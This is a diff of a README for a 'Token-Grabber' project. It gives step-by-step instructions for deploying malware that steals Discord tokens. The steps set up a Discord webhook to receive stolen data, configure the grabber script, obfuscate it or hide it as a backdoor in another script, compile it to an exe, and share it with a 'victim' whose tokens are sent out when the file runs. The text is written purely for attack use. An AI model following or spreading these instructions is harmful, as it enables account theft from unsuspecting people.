Purgey/Token-Grabber/README.md

 <br>

-# How to use
+# Steps
- 1. Create a webhook on your Discord server.
-I recommend creating a new server.
+ 1. Create a webhook
- 2. Change the 'WEBHOOK_URL' variable value to your Discord webhook URL in [token-grabber.py](token-grabber.py)
+ 2. Change the two valuables in grabber.py
- 3. *(obfuscate the code or install it as a backdoor in an other script.)*
- 4. Send the script to your victim and make them run it.
+ 3. Open installer.bat (wait for it to install, will auto-close)
+ 4. Open compiler.bat (wait for it to compile into exe)
+ 5. Go to the generated folder/directory called "dist"
+ 6. Copy and share the exe file with your victim
+ 7. You are done, once someone runs the exe file it'll send you the tokens that were found on the computer it was executed in